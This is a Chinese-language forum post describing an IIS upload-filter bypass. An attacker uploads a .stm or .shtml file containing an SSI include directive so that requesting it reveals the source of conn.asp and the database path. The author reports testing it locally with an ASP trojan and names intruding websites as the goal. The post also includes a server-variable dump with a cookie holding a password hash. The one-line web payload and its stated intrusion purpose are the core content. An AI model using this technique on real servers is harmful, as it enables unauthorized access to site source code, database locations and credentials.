當網站不允許上傳asp cer cdx htr檔案時的一個解決方案！

前些天向lcx大哥求教關於web上傳的問題，說起利用stm來上傳，還能執行程式，不解，就給我了一段代碼：
見lcx大哥給的一段代碼
說儲存為stm或者shtml看看，運行如下:

HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate
當前檔案名稱:F:\Web\1.stm

Web伺服器的名稱和版本:Microsoft-IIS/5.0
主機名稱:localhost
連接埠:80
客戶或客戶代理IP地址:127.0.0.1
客戶或客戶代理主機名稱:127.0.0.1
PATH_INFO 的值，但帶有擴充為某個目錄規範的虛擬路徑:F:\Web\1.stm
用戶端給出附加路徑資訊:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*

一直不解！
今天在幻影旅團看到了一段話
引用

當網站不允許上傳asp cer cdx htr等檔案時, 上傳一個stm檔案, 內容為:
<!--#include file="conn.asp"-->
直接請求這個stm檔案, conn.asp就一覽無遺, 資料庫路徑也就到手啦!

並且又看了那篇shtml的介紹後，恍然大悟，終於明白了！
原來就是如上所說的，
[color=Green]<!--#include file="conn.asp"-->
　　就是一條SSI指令，其作用是將"info.htm"的內容拷貝到當前的頁面中，當訪問者來瀏覽時，會看到其它HTML文檔一樣顯示info.htm其中的內容。[/color]
我在本地實驗成功！在我的iis目錄下建了一個test.stm檔案，內容為：
<!--#include file="ok.asp"-->

又在同一目錄下放了一個我的一個木馬檔案ok.asp
在瀏覽器中請求test.stm，沒有什麼反映，一片空白。
但是一查看原始碼，狂暈，原來就是我的asp檔案的內容！
這樣我們就可以利用這個來擷取要入侵的web的conn檔案來獲得資料庫路徑，
但是一個前提是伺服器的對stm或者shtml的擴充沒有刪除！
再次感謝lcx大哥的指導！